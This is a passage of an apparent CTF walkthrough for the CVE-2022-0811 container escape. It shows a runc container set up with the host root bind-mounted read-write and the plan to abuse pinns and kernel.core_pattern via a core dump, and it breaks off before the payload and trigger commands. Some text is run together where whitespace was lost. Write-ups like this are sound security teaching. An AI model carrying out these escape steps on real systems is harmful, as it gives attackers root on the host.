Reading about the exploit we should (1) create a pod/container, (2) use pinns to exploit the vulnerable variable kernel.core_pattern, (3) trigger a core dump and then reap the rewards. More information here: CVE-2022-0811
Create a container using kubectl, minikube, docker or runc.
## Create location for runc filesystemethan@vessel:/$mkdir/tmp/pthreeethan@vessel:/$mkdir/tmp/pthree/rootfs## Create runc configurationethan@vessel:/tmp/pthree$runcspec--rootless## Add following data under 'mounts' section of config.json{"type":"bind","source":"/","destination":"/","options": ["rbind","rw","rprivate"]},## Start runcethan@vessel:/tmp/pthree$runcrunprivescroot@runc:/#hostnamerunc
Open a second terminal and write a simple PoC script to be executed
Verify that netns and utsns are created in /tmp/pthree from the container:
# ls -al /tmp/pthreetotal24drwxrwxr-x5rootroot4096Sep209:07.drwxrwxrwt17nobodynogroup4096Sep209:03..-rw-rw-r--1rootroot2893Sep208:59config.jsondrwxr-xr-x2nobodyroot4096Sep209:07netnsdrwxrwxr-x2rootroot4096Sep208:58rootfsdrwxr-xr-x2nobodyroot4096Sep209:07utsns
In the first terminal (runc container) trigger a core dump to run the script: